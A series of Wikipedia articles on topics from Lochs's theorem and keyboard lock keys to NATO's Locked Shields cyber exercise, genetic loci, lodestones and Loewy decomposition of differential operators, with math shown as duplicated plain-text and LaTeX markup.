Proof. Since T n x ≤ 1 {\textstyle T^{n}x\leq 1} , we have 1 n ln T n x → 0 {\textstyle {\frac {1}{n}}\ln T^{n}x\to 0} if and only if lim inf 1 n ln T n x = 0 {\displaystyle \liminf {\frac {1}{n}}\ln T^{n}x=0} Let us consider the set of all x {\textstyle x} that have lim inf 1 n ln T n x < 0 {\textstyle \liminf {\frac {1}{n}}\ln T^{n}x<0} . That is, { x : ∃ c > 0 , ∀ N ≥ 1 , ∃ n ≥ N , T n x < e − c n } {\displaystyle \{x:\exists c>0,\forall N\geq 1,\exists n\geq N,T^{n}x<e^{-cn}\}} = ∪ c > 0 ∩ N ≥ 1 ∪ n ≥ N [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle =\cup _{c>0}\cap _{N\geq 1}\cup _{n\geq N}[0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} where [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle [0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} denotes the set of numbers whose continued fraction expansion has a n > e c n {\displaystyle a_{n}>e^{cn}} , but no other constraints.
Now, since the Gauss map preserves the Gauss measure, [ 0 ; N , … , N , a n > e c n , N , … ] {\displaystyle [0;\mathbb {N} ,\dots ,\mathbb {N} ,a_{n}>e^{cn},\mathbb {N} ,\dots ]} has the same Gauss measure as [ 0 ; a n > e c n , N , … ] {\textstyle [0;a_{n}>e^{cn},\mathbb {N} ,\dots ]} , which is the same as
∫ 0 e − c n ρ ( t ) d t = log 2 ( 1 + e − c n ) ∼ e − c n ln 2 {\displaystyle \int _{0}^{e^{-cn}}\rho (t)dt=\log _{2}(1+e^{-cn})\sim {\frac {e^{-cn}}{\ln 2}}} The union over ∪ n ≥ N {\textstyle \cup _{n\geq N}} sums to ∼ e − c N ( 1 − e − c ) ln 2 {\textstyle \sim {\frac {e^{-cN}}{(1-e^{-c})\ln 2}}} , which at the N → ∞ {\textstyle N\to \infty } limit is zero.
Thus the set of such x {\textstyle x} has Gauss measure zero.
Now, expand the term using basic continued fraction properties: ln | x − p n q n | = ln T n x q n ( q n + q n − 1 T n x ) = − 2 ln q n + ln T n x − ln ( 1 + q n − 1 q n T n x ) {\displaystyle \ln \left|x-{\frac {p_{n}}{q_{n}}}\right|=\ln {\frac {T^{n}x}{q_{n}(q_{n}+q_{n-1}T^{n}x)}}=-2\ln q_{n}+\ln T^{n}x-\ln \left(1+{\frac {q_{n-1}}{q_{n}}}T^{n}x\right)} The second is o ( n ) {\textstyle o(n)} . The third term is ∈ [ ln 1 , ln 2 ] {\textstyle \in [\ln 1,\ln 2]} . Both disappear after dividing by n {\displaystyle n} . Thus lim n 1 n ln | x − p n q n | = − 2 lim n 1 n ln q n = − π 2 6 ln 2 {\displaystyle \lim _{n}{\frac {1}{n}}\ln \left|x-{\frac {p_{n}}{q_{n}}}\right|=-2\lim _{n}{\frac {1}{n}}\ln q_{n}=-{\frac {\pi ^{2}}{6\ln 2}}} where we used the result from Lévy's constant . | https://en.wikipedia.org/wiki/Lochs's_theorem |
LOCK is a function that locks part of a keyboard 's keys into a distinct mode of operation , depending on the lock settings selected. [ 1 ]
Most keyboards have three different types of lock functions:
Some laptops and compact keyboards also have a Function Lock - FN Lock . On these devices, a Fn modifier key is used to combine keys to save room and add non-standard functionality; a common use is merging the row with keys F1- F12 with keys that adjust settings such as display brightness, media volume and playback, and keyboard illumination. Fn Lock toggles the default output of these keys.
The lock keys are scattered around the keyboard. Most styles of keyboards have three LEDs indicating which locks are enabled, in the upper right corner above the numpad . Some ergonomic keyboards instead place the lock indicators in between the key split. Some brands of keyboards have a function mode key (also called F mode or Office Lock ), and may replace the scroll lock indicator with an office lock indicator. Office Lock, when enabled, will enable alternate functions of the function keys , meant for use with various word processing or email programs.
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lock_key |
In helicopter aerodynamics , the Lock number is the ratio of aerodynamic forces, which act to lift the rotor blades , to inertial forces, which act to maintain the blades in the plane of rotation. [ 1 ] It is named after C. N. H. Lock , a British aerodynamicist who studied autogyros in the 1920s. [ 2 ] [ 3 ] : 267
Typical rotorcraft blades have a Lock number between 3 and 12, [ 4 ] usually approximately 8. [ 5 ] The Lock number is typically 8 to 10 for articulated rotors and 5 to 7 for hingeless rotors. [ 3 ] : 186 High-stiffness blades may have a Lock number up to 14. [ 4 ]
Larger blades have a higher mass and more inertia, so tend to have a lower Lock number. Helicopter rotors with more than two blades can have lighter blades, so tend to have a higher Lock number. [ 4 ]
A low Lock number gives good autorotation characteristics due to higher inertia, however this comes with a mass penalty. [ 3 ] : 327
Ray Prouty writes, "The previously discussed numbers: Mach, Reynolds and Froude are used in many fields of fluid dynamic studies. The Lock number is ours alone." [ 2 ]
For a rectangular blade of radius R {\displaystyle R} , and chord c {\displaystyle c} , the Lock number γ {\displaystyle \gamma } , is calculated as, [ 5 ]
γ = ρ C L α c R 4 I b {\displaystyle \gamma ={\frac {\rho C_{L\alpha }cR^{4}}{I_{b}}}}
where:
This fluid dynamics –related article is a stub . You can help Wikipedia by expanding it .
This aviation -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lock_number |
Locked Shields is an annual cyber defence exercise organised by NATO 's Cooperative Cyber Defence Centre of Excellence in Tallinn since 2010. The format is usually that a red team simulates a hostile attack while blue teams from the participating nations simulate their coordination and defence against this. [ 1 ]
The performance of teams is assessed using a mix of automated and manual scoring. [ 2 ] In 2022, there were 24 teams with an average of 50 experts in each team. [ 3 ] The team from Finland was declared as the 2022 winner for the excellence of their situation reporting and solid defence. [ 4 ]
This computing article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locked_Shields |
In superconductivity , the Lockin effect refers to the preference of vortex phases to be positioned at certain points within cells of a crystal lattice of an organic superconductor .
Studies of the Vortex Phases in an Organic Superconductor
This condensed matter physics -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lockin_effect |
In genetics , a locus ( pl. : loci ) is a specific, fixed position on a chromosome where a particular gene or genetic marker is located. [ 1 ] Each chromosome carries many genes, with each gene occupying a different position or locus; in humans, the total number of protein-coding genes in a complete haploid set of 23 chromosomes is estimated at 19,000–20,000. [ 2 ]
Genes may possess multiple variants known as alleles , and an allele may also be said to reside at a particular locus. Diploid and polyploid cells whose chromosomes have the same allele at a given locus are called homozygous with respect to that locus, while those that have different alleles at a given locus are called heterozygous . [ 3 ] The ordered list of loci known for a particular genome is called a gene map . Gene mapping is the process of determining the specific locus or loci responsible for producing a particular phenotype or biological trait . Association mapping , also known as "linkage disequilibrium mapping", is a method of mapping quantitative trait loci (QTLs) that takes advantage of historic linkage disequilibrium to link phenotypes (observable characteristics) to genotypes (the genetic constitution of organisms), uncovering genetic associations.
The shorter arm of a chromosome is termed the p arm or p-arm , while the longer arm is the q arm or q-arm . The chromosomal locus of a typical gene, for example, might be written 3p22.1 , where: [ citation needed ]
Thus the entire locus of the example above would be read as "three P two two point one". The cytogenetic bands are areas of the chromosome either rich in actively-transcribed DNA ( euchromatin ) or packaged DNA ( heterochromatin ). They appear differently upon staining (for example, euchromatin appears white and heterochromatin appears black on Giemsa staining ). They are counted from the centromere out toward the telomeres . [ citation needed ]
A range of loci is specified in a similar way. For example, the locus of gene OCA1 may be written "11q1.4-q2.1", meaning it is on the long arm of chromosome 11, somewhere in the range from sub-band 4 of region 1 to sub-band 1 of region 2. [ citation needed ]
The ends of a chromosome are labeled "pter" and "qter" , and so "2qter" refers to the terminus of the long arm of chromosome 2. [ citation needed ] | https://en.wikipedia.org/wiki/Locus_(genetics) |
The locus of enterocyte effacement (LEE) is a moderately conserved pathogenicity island consisting of 35,000 base pairs in the bacteria Escherichia coli genome. The LEE encodes the Type III secretion system and associated chaperones and effector proteins responsible for attaching and effacing (AE) lesions in the large intestine . These proteins include intimin , Tir , EspC , EspF , EspH , and Map protein . The LEE has a 39% G+C ratio . [ 1 ] [ clarification needed ]
This cell biology article is a stub . You can help Wikipedia by expanding it .
This microbiology -related article is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Locus_of_enterocyte_effacement |
The locus of enterocyte effacement-encoded regulator ( Ler ) is a regulatory protein that controls bacterial pathogenicity of enteropathogenic Escherichia coli (EPEC) and enterohemorrhagic Escherichia coli (EHEC) . [ 1 ] More specifically, Ler regulates the locus of enterocyte effacement (LEE) pathogenicity island genes, which are responsible for creating intestinal attachment and effacing lesions and subsequent diarrhea : LEE1, LEE2, and LEE3. [ 1 ] LEE1, 2, and 3 carry the information necessary for a type III secretion system . The transcript encoding the Ler protein is the open reading frame 1 on the LEE1 operon . [ 1 ]
The mechanism of Ler regulation involves competition with histone-like nucleoid structuring protein (H-NS) , a negative regulator of the LEE pathogenicity island. [ 2 ] Ler is regulated by many factors such as plasmid encoded regulator (Per), integration host factor , Fis , BipA, a positive regulatory loop involving GrlA, and quorum sensing mediated by luxS . [ 3 ] [ 4 ]
Ler positively regulates the LEE genes by competition with its homolog, H-NS. [ 5 ] H-NS silences LEE genes via rigid filament structures bound to the DNA that Ler disrupts and replaces through unknown mechanisms. [ 5 ] [ 6 ] Though little is known of the mechanism of Ler regulation, Ler interacts with DNA in specific ways. Ler binds DNA non-cooperatively, bends DNA in low concentrations, stiffens it in high concentration, and forms toroidal nucleoprotein complexes along DNA in vivo . [ 5 ] [ 7 ]
The regulation of Ler and its transcript, ler , is complex and many-fold. The plasmid encoded regulator (per) directly activates the region of the LEE1 operon which encodes Ler. [ 1 ] Integration host factor is also a direct activator of ler and binds upstream of its promoter. [ 8 ]
Jeannette Barba and her colleagues at the National Autonomous University of Mexico elucidated a positive regulatory loop between Ler, ler , GrlA, and grlRA . GrlA is also a LEE encoded regulator of the LEE pathogenicity island. They found that GrlA activates ler , and that Ler activates grlRA indicating a loop of activation wherein a protein product activates a transcript whose protein product activates the transcript of the original protein. Ler activates grlRA only if H-NS is present, this is not the case for GrlA activation of ler . [ 4 ]
Quorum sensing plays a role in Ler regulation. LuxS is an important protein involved in quorum sensing, particularly in the synthesis of autoinducer molecules. Quorum-sensing E. coli regulator A (QseA) is found in LuxS systems and activates transcription of ler . [ 3 ] Fis, a nucleoid associated protein essential for EPEC's ability to form attaching and effacing lesions, partly acts through activation of Ler expression. [ 9 ] BipA, a ribosomal binding GTPase and prolific regulator of EPEC virulence, transcriptionally regulates Ler from an upstream position where it also regulates other genes. [ 10 ]
The Ler protein also represses its own transcript on the LEE1 operon through DNA looping which prevents RNA polymerase from completing transcription. [ 11 ] [ 12 ] | https://en.wikipedia.org/wiki/Locus_of_enterocyte_effacement-encoded_regulator |
Locus suicide recombination (LSR) constitutes a variant form of class switch recombination that eliminates all immunoglobulin heavy chain constant genes. [ 1 ] It thus terminates immunoglobulin and B-cell receptor (BCR) expression in B-lymphocytes and results in B-cell death since survival of such cells requires BCR expression. This process is initiated by the enzyme activation-induced deaminase upon B-cell activation. LSR is thus one of the pathways that can result into activation-induced cell death in the B-cell lineage. [ 2 ] | https://en.wikipedia.org/wiki/Locus_suicide_recombination |
Lode coordinates ( z , r , θ ) {\displaystyle (z,r,\theta )} or Haigh–Westergaard coordinates ( ξ , ρ , θ ) {\displaystyle (\xi ,\rho ,\theta )} . [ 1 ] are a set of tensor invariants that span the space of real , symmetric , second-order, 3-dimensional tensors and are isomorphic with respect to principal stress space . This right-handed orthogonal coordinate system is named in honor of the German scientist Dr. Walter Lode because of his seminal paper written in 1926 describing the effect of the middle principal stress on metal plasticity. [ 2 ] Other examples of sets of tensor invariants are the set of principal stresses ( σ 1 , σ 2 , σ 3 ) {\displaystyle (\sigma _{1},\sigma _{2},\sigma _{3})} or the set of kinematic invariants ( I 1 , J 2 , J 3 ) {\displaystyle (I_{1},J_{2},J_{3})} . The Lode coordinate system can be described as a cylindrical coordinate system within principal stress space with a coincident origin and the z-axis parallel to the vector ( σ 1 , σ 2 , σ 3 ) = ( 1 , 1 , 1 ) {\displaystyle (\sigma _{1},\sigma _{2},\sigma _{3})=(1,1,1)} .
The Lode coordinates are most easily computed using the mechanics invariants . These invariants are a mixture of the invariants of the Cauchy stress tensor , σ {\displaystyle {\boldsymbol {\sigma }}} , and the stress deviator , s {\displaystyle {\boldsymbol {s}}} , and are given by [ 3 ]
which can be written equivalently in Einstein notation
where ϵ {\displaystyle \epsilon } is the Levi-Civita symbol (or permutation symbol) and the last two forms for J 2 {\displaystyle J_{2}} are equivalent because s {\displaystyle {\boldsymbol {s}}} is symmetric ( s i j = s j i {\displaystyle s_{ij}=s_{ji}} ).
The gradients of these invariants [ 4 ] can be calculated by
where I {\displaystyle {\boldsymbol {I}}} is the second-order identity tensor and T {\displaystyle {\boldsymbol {T}}} is called the Hill tensor.
The z {\displaystyle z} -coordinate is found by calculating the magnitude of the orthogonal projection of the stress state onto the hydrostatic axis.
where
is the unit normal in the direction of the hydrostatic axis.
The r {\displaystyle r} -coordinate is found by calculating the magnitude of the stress deviator (the orthogonal projection of the stress state into the deviatoric plane).
where
and writing σ {\displaystyle \sigma } in terms of the isotropic and deviatoric parts while expanding the magnitude of s {\displaystyle {\boldsymbol {s}}}
Because E z {\displaystyle {\boldsymbol {E_{z}}}} is isotropic and s {\displaystyle {\boldsymbol {s}}} is deviatoric, their product is zero. Which leaves us with
Applying the identity A : B = t r ( A T ⋅ B ) {\displaystyle {\boldsymbol {A}}\colon {\boldsymbol {B}}=\mathrm {tr} \left({\boldsymbol {A}}^{T}\cdot {\boldsymbol {B}}\right)} and using the definition of J 2 = 1 2 t r ( s ⋅ s ) {\displaystyle J_{2}={\frac {1}{2}}\mathrm {tr} \left({\boldsymbol {s}}\cdot {\boldsymbol {s}}\right)}
is a unit tensor in the direction of the radial component.
The Lode angle can be considered, rather loosely, a measure of loading type. The Lode angle varies with respect to the middle eigenvalue of the stress. There are many definitions of Lode angle that each utilize different trigonometric functions: the positive sine, [ 5 ] negative sine, [ 6 ] and positive cosine [ 7 ] (here denoted θ s {\displaystyle \theta _{s}} , θ ¯ s {\displaystyle {\bar {\theta }}_{s}} , and θ c {\displaystyle \theta _{c}} , respectively)
and are related by
Because cosine is an even function and the range of the inverse cosine is usually 0 ≤ cos − 1 ( θ ) ≤ 1 {\displaystyle 0\leq \cos ^{-1}(\theta )\leq 1} we take the negative possible value for the θ s {\displaystyle \theta _{s}} term, thus ensuring that θ c {\displaystyle \theta _{c}} is positive.
These definitions are all defined for a range of π / 3 {\displaystyle \pi /3} .
The unit normal in the angular direction which completes the orthonormal basis can be calculated for θ s {\displaystyle \theta _{s}} [ 8 ] and θ c {\displaystyle \theta _{c}} [ 9 ] using
The meridional profile is a 2D plot of ( z , r ) {\displaystyle (z,r)} holding θ {\displaystyle \theta } constant and is sometimes plotted using scalar multiples of ( z , r ) {\displaystyle (z,r)} . It is commonly used to demonstrate the pressure dependence of a yield surface or the pressure-shear trajectory of a stress path. Because r {\displaystyle r} is non-negative the plot usually omits the negative portion of the r {\displaystyle r} -axis, but can be included to illustrate effects at opposing Lode angles (usually triaxial extension and triaxial compression).
One of the benefits of plotting the meridional profile with ( z , r ) {\displaystyle (z,r)} is that it is a geometrically accurate depiction of the yield surface. [ 8 ] If a non-isomorphic pair is used for the meridional profile then the normal to the yield surface will not appear normal in the meridional profile. Any pair of coordinates that differ from ( z , r ) {\displaystyle (z,r)} by constant multiples of equal absolute value are also isomorphic with respect to principal stress space. As an example, pressure p = − I 1 / 3 {\displaystyle p=-I1/3} and the Von Mises stress σ v = 3 J 2 {\displaystyle \sigma _{v}={\sqrt {3J_{2}}}} are not an isomorphic coordinate pair and, therefore, distort the yield surface because
and, finally, | − 1 / 3 | ≠ | 3 / 2 | {\displaystyle |-1/{\sqrt {3}}|\neq |{\sqrt {3/2}}|} .
The octahedral profile is a 2D plot of ( r , θ ) {\displaystyle (r,\theta )} holding z {\displaystyle z} constant. Plotting the yield surface in the octahedral plane demonstrates the level of Lode angle dependence. The octahedral plane is sometimes referred to as the 'pi plane' [ 10 ] or 'deviatoric plane'. [ 11 ]
The octahedral profile is not necessarily constant for different values of pressure with the notable exceptions of the von Mises yield criterion and the Tresca yield criterion which are constant for all values of pressure.
The term Haigh-Westergaard space is ambiguously used in the literature to mean both the Cartesian principal stress space [ 12 ] [ 13 ] and the cylindrical Lode coordinate space [ 14 ] [ 15 ] | https://en.wikipedia.org/wiki/Lode_coordinates |
Lodestones are naturally magnetized pieces of the mineral magnetite . [ 1 ] [ 2 ] They are naturally occurring magnets , which can attract iron . The property of magnetism was first discovered in antiquity through lodestones. [ 3 ] Pieces of lodestone, suspended so they could turn, were the first magnetic compasses , [ 3 ] [ 4 ] [ 5 ] [ 6 ] and their importance to early navigation is indicated by the name lodestone , which in Middle English means "course stone" or "leading stone", [ 7 ] from the now-obsolete meaning of lode as "journey, way". [ 8 ]
Lodestone is one of only a very few minerals that is found naturally magnetized. [ 1 ] Magnetite is black or brownish-black, with a metallic luster , a Mohs hardness of 5.5–6.5 and a black streak .
The process by which lodestone is created has long been an open question in geology. Only a small amount of the magnetite on the Earth is found magnetized as lodestone. Ordinary magnetite is attracted to a magnetic field as iron and steel are, but does not tend to become magnetized itself; it has too low a magnetic coercivity , or resistance to magnetization or demagnetization. [ 9 ] Microscopic examination of lodestones has found them to be made of magnetite (Fe 3 O 4 ) with inclusions of maghemite (cubic Fe 2 O 3 ), often with impurity metal ions of titanium , aluminium , and manganese . [ 9 ] [ 10 ] [ 11 ] This inhomogeneous crystalline structure gives this variety of magnetite sufficient coercivity to remain magnetized and thus be a permanent magnet . [ 9 ] [ 10 ] [ 11 ]
The other question is how lodestones get magnetized . The Earth's magnetic field at 0.5 gauss is too weak to magnetize a lodestone by itself. [ 9 ] [ 10 ] The leading theory is that lodestones are magnetized by the strong magnetic fields surrounding lightning bolts. [ 9 ] [ 10 ] [ 11 ] This is supported by the observation that they are mostly found near the surface of the Earth, rather than buried at great depth. [ 10 ]
One of the earliest known references to lodestone's magnetic properties was made by 6th century BC Greek philosopher Thales of Miletus , [ 12 ] whom the ancient Greeks credited with discovering lodestone's attraction to iron and other lodestones. [ 13 ] The name magnet may come from lodestones found in Magnesia , Anatolia . [ 14 ] The ancient Indian medical text Sushruta Samhita describes using magnetic properties of the lodestone to remove arrows embedded in a person's body. [ citation needed ]
The earliest Chinese literary reference to magnetism occurs in the 4th-century BC Book of the Devil Valley Master ( Guiguzi ). [ 15 ] In the chronicle Lüshi Chunqiu , from the 2nd century BC, it is explicitly stated that "the lodestone makes iron come or it attracts it." [ 16 ] [ 17 ] The earliest mention of a needle's attraction appears in a work composed between 20 and 100 AD, the Lunheng ( Balanced Inquiries ): "A lodestone attracts a needle." [ 18 ] In the 2nd century BC, Chinese geomancers were experimenting with the magnetic properties of lodestone to make a "south-pointing spoon" for divination. When it is placed on a smooth bronze plate, the spoon would invariably rotate to a north–south axis. [ 19 ] [ 20 ] [ 21 ] While this has been shown to work, archaeologists have yet to discover an actual spoon made of magnetite in a Han tomb. [ 22 ]
Based on his discovery of an Olmec artifact (a shaped and grooved magnetic bar) in North America, astronomer John Carlson suggests that lodestone may have been used by the Olmec more than a thousand years prior to the Chinese discovery. [ 23 ] Carlson speculates that the Olmecs, for astrological or geomantic purposes, used similar artifacts as a directional device, or to orient their temples, the dwellings of the living, or the interments of the dead. [ 23 ] Detailed analysis of the Olmec artifact revealed that the "bar" was composed of hematite with titanium lamellae of Fe 2–x Ti x O 3 that accounted for the anomalous remanent magnetism of the artifact. [ 24 ]
"A century of research has pushed back the first mention of the magnetic compass in Europe to Alexander Neckam about +1190, followed soon afterwards by Guyot de Provins in +1205 and Jacques de Vitry in +1269. All other European claims have been excluded by detailed study..." [ 25 ]
Lodestones have frequently been displayed as valuable or prestigious objects. The Ashmolean Museum in Oxford contains a lodestone adorned with a gilt coronet that was donated by Mary Cavendish in 1756, possibly to secure her husband's appointment as Chancellor of Oxford University. [ 26 ] Isaac Newton 's signet ring reportedly contained a lodestone which was capable of lifting more than 200 times its own weight. [ 27 ] And in 17th century London, the Royal Society displayed a 6-inch (15 cm) spherical lodestone (a terrella or 'little Earth'), which was used to illustrate the Earth's magnetic fields and the function of mariners' compasses. [ 28 ] One contemporary writer, the satirist Ned Ward , noted how the terrella "made a paper of Steel Filings prick up themselves one upon the back of another, that they stood pointing like the Bristles of a Hedge-Hog ; and gave such Life and Merriment to a Parcel of Needles, that they danc'd [...] as if the devil were in them." [ 29 ] | https://en.wikipedia.org/wiki/Lodestone |
Lodovico de Ferrari (2 February 1522 – 5 October 1565) was an Italian mathematician best known today for solving the biquadratic equation .
Born in Bologna , Lodovico's grandfather, Bartolomeo Ferrari, was forced out of Milan to Bologna. Lodovico settled in Bologna, and he began his career as the servant of Gerolamo Cardano . He was extremely bright, so Cardano started teaching him mathematics. Ferrari aided Cardano on his solutions for biquadratic equations and cubic equations , and was mainly responsible for the solution of biquadratic equations that Cardano published. While still in his teens, Ferrari was able to obtain a prestigious teaching post in Rome after Cardano resigned from it and recommended him. Ferrari retired when young at 42 years old, and wealthy. [ 1 ] : 300 He then moved back to his home town of Bologna where he lived with his widowed sister Maddalena to take up a professorship of mathematics at the University of Bologna in 1565. Shortly thereafter, he died of white arsenic poisoning, according to a legend, by his sister. [ 2 ] : 18
In 1545 a famous dispute erupted between Ferrari and Cardano's contemporary Niccolò Fontana Tartaglia , involving the solution to cubic equations. Widespread stories that Tartaglia devoted the rest of his life to ruining Ferrari's teacher and erstwhile master Cardano, however, appear to be fabricated. [ 3 ] Mathematical historians now credit both Cardano and Tartaglia with the formula to solve cubic equations, referring to it as the " Cardano–Tartaglia formula ".
This article about an Italian mathematician is a stub . You can help Wikipedia by expanding it . | https://en.wikipedia.org/wiki/Lodovico_Ferrari |
In mathematics, Loewner order is the partial order defined by the convex cone of positive semi-definite matrices . This order is usually employed to generalize the definitions of monotone and concave/convex scalar functions to monotone and concave/convex Hermitian valued functions . These functions arise naturally in matrix and operator theory and have applications in many areas of physics and engineering.
Let A and B be two Hermitian matrices of order n . We say that A ≥ B if A − B is positive semi-definite . Similarly, we say that A > B if A − B is positive definite .
Although it is commonly discussed on matrices (as a finite-dimensional case), the Loewner order is also well-defined on operators (an infinite-dimensional case) in the analogous way.
When A and B are real scalars (i.e. n = 1), the Loewner order reduces to the usual ordering of R . Although some familiar properties of the usual order of R are also valid when n ≥ 2, several properties are no longer valid. For instance, the comparability of two matrices may no longer be valid. In fact, if A = [ 1 0 0 0 ] {\displaystyle A={\begin{bmatrix}1&0\\0&0\end{bmatrix}}\ } and B = [ 0 0 0 1 ] {\displaystyle B={\begin{bmatrix}0&0\\0&1\end{bmatrix}}\ } then neither A ≥ B or B ≥ A holds true. In other words, the Loewner order is a partial order , but not a total order .
Moreover, since A and B are Hermitian matrices, their eigenvalues are all real numbers.
If λ 1 ( B ) is the maximum eigenvalue of B and λ n ( A ) the minimum eigenvalue of A , a sufficient criterion to have A ≥ B is that λ n ( A ) ≥ λ 1 ( B ). If A or B is a multiple of the identity matrix , then this criterion is also necessary.
The Loewner order does not have the least-upper-bound property , and therefore does not form a lattice . It is bounded: for any finite set S {\displaystyle S} of matrices, one can find an "upper-bound" matrix A that is greater than all of S. However, there will be multiple upper bounds. In a lattice, there would exist a unique maximum max ( S ) {\displaystyle \max(S)} such that any upper bound U on S {\displaystyle S} obeys max ( S ) {\displaystyle \max(S)} ≤ U . But in the Loewner order, one can have two upper bounds A and B that are both minimal (there is no element C < A that is also an upper bound) but that are incomparable ( A - B is neither positive semidefinite nor negative semidefinite). | https://en.wikipedia.org/wiki/Loewner_order |
In the study of differential equations , the Loewy decomposition breaks every linear ordinary differential equation (ODE) into what are called largest completely irreducible components. It was introduced by Alfred Loewy . [ 1 ]
Solving differential equations is one of the most important subfields in mathematics . Of particular interest are solutions in closed form . Breaking ODEs into largest irreducible components, reduces the process of solving the original equation to solving irreducible equations of lowest possible order. This procedure is algorithmic , so that the best possible answer for solving a reducible equation is guaranteed. A detailed discussion may be found in. [ 2 ]
Loewy's results have been extended to linear partial differential equations (PDEs) in two independent variables. In this way, algorithmic methods for solving large classes of linear PDEs have become available.
Let D ≡ d d x {\textstyle D\equiv {\frac {d}{dx}}} denote the derivative with respect to the variable x {\displaystyle x} .
A differential operator of order n {\displaystyle n} is a polynomial of the form L ≡ D n + a 1 D n − 1 + ⋯ + a n − 1 D + a n {\displaystyle L\equiv D^{n}+a_{1}D^{n-1}+\cdots +a_{n-1}D+a_{n}} where the coefficients a i {\displaystyle a_{i}} , i = 1 , … , n {\displaystyle i=1,\ldots ,n} are from some function field, the base field of L {\displaystyle L} . Usually it is the field of rational functions in the variable x {\displaystyle x} , i.e. a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . If y {\displaystyle y} is an indeterminate with d y d x ≠ 0 {\textstyle {\frac {dy}{dx}}\neq 0} , L y {\displaystyle Ly} becomes a differential polynomial, and L y = 0 {\displaystyle Ly=0} is the differential equation corresponding to L {\displaystyle L} .
An operator L {\displaystyle L} of order n {\displaystyle n} is called reducible if it may be represented as the product of two operators L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} , both of order lower than n {\displaystyle n} . Then one writes L = L 1 L 2 {\displaystyle L=L_{1}L_{2}} , i.e. juxtaposition means the operator product, it is defined by the rule D a i = a i D + a i ′ {\displaystyle Da_{i}=a_{i}D+a_{i}'} ; L 1 {\displaystyle L_{1}} is called a left factor of L {\displaystyle L} , L 2 {\displaystyle L_{2}} a right factor. By default, the coefficient domain of the factors is assumed to be the base field of L {\displaystyle L} , possibly extended by some algebraic numbers , i.e. Q ¯ ( x ) {\displaystyle {\bar {\mathbb {Q} }}(x)} is allowed. If an operator does not allow any right factor it is called irreducible .
For any two operators L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} the least common left multiple Lclm ( L 1 , L 2 ) {\displaystyle \operatorname {Lclm} (L_{1},L_{2})} is the operator of lowest order such that both L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} divide it from the right. The greatest common right divisior Gcrd ( L 1 , L 2 ) {\displaystyle \operatorname {Gcrd} (L_{1},L_{2})} is the operator of highest order that divides both L 1 {\displaystyle L_{1}} and L 2 {\displaystyle L_{2}} from the right. If an operator may be represented as Lclm {\displaystyle \operatorname {Lclm} } of irreducible operators it is called completely reducible . By definition, an irreducible operator is called completely reducible.
If an operator is not completely reducible, the Lclm {\displaystyle \operatorname {Lclm} } of its irreducible right factors is divided out and the same procedure is repeated with the quotient . Due to the lowering of order in each step, this proceeding terminates after a finite number of iterations and the desired decomposition is obtained. Based on these considerations, Loewy [ 1 ] obtained the following fundamental result.
Theorem 1 (Loewy 1906) — Let D = d d x {\textstyle D={\frac {d}{dx}}} be a derivative and a i ∈ Q ( x ) {\displaystyle a_{i}\in \mathbb {Q} (x)} . A differential operator L ≡ D n + a 1 D n − 1 + ⋯ + a n − 1 D + a n {\displaystyle L\equiv D^{n}+a_{1}D^{n-1}+\cdots +a_{n-1}D+a_{n}} of order n {\displaystyle n} may be written uniquely as the product of completely reducible factors L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} of maximal order d k {\displaystyle d_{k}} over Q ( x ) {\displaystyle \mathbb {Q} (x)} in the form L = L m ( d m ) L m − 1 ( d m − 1 ) … L 1 ( d 1 ) {\displaystyle L=L_{m}^{(d_{m})}L_{m-1}^{(d_{m-1})}\ldots L_{1}^{(d_{1})}} with d 1 + … + d m = n {\displaystyle d_{1}+\ldots +d_{m}=n} . The factors L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} are unique. Any factor L k ( d k ) {\displaystyle L_{k}^{(d_{k})}} , k = 1 , … , m {\displaystyle k=1,\ldots ,m} may be written as L k ( d k ) = Lclm ( l j 1 ( e 1 ) , l j 2 ( e 2 ) , … , l j k ( e k ) ) {\displaystyle L_{k}^{(d_{k})}=\operatorname {Lclm} \left(l_{j_{1}}^{(e_{1})},l_{j_{2}}^{(e_{2})},\ldots ,l_{j_{k}}^{(e_{k})}\right)} with e 1 + e 2 + ⋯ + e k = d k {\displaystyle e_{1}+e_{2}+\dots +e_{k}=d_{k}} ; l j i ( e i ) {\displaystyle l_{j_{i}}^{(e_{i})}} for i = 1 , … , k {\displaystyle i=1,\ldots ,k} , denotes an irreducible operator of order e i {\displaystyle e_{i}} over Q ( x ) {\displaystyle \mathbb {Q} (x)} .
The decomposition determined in this theorem is called the Loewy decomposition of L {\displaystyle L} . It provides a detailed description of the function space containing the solution of a reducible linear differential equation L y = 0 {\displaystyle Ly=0} .
For operators of fixed order the possible Loewy decompositions, differing by the number and the order of factors, may be listed explicitly; some of the factors may contain parameters. Each alternative is called a type of Loewy decomposition . The complete answer for n = 2 {\displaystyle n=2} is detailed in the following corollary to the above theorem. [ 3 ]
Corollary 1 Let L {\displaystyle L} be a second-order operator. Its possible Loewy decompositions are denoted by L 0 2 , … , L 3 2 {\displaystyle {\mathcal {L}}_{0}^{2},\ldots ,{\mathcal {L}}_{3}^{2}} , they may be described as follows; l ( i ) {\displaystyle l^{(i)}} and l j ( i ) {\displaystyle l_{j}^{(i)}} are irreducible operators of order i {\displaystyle i} ; C {\displaystyle C} is a constant.
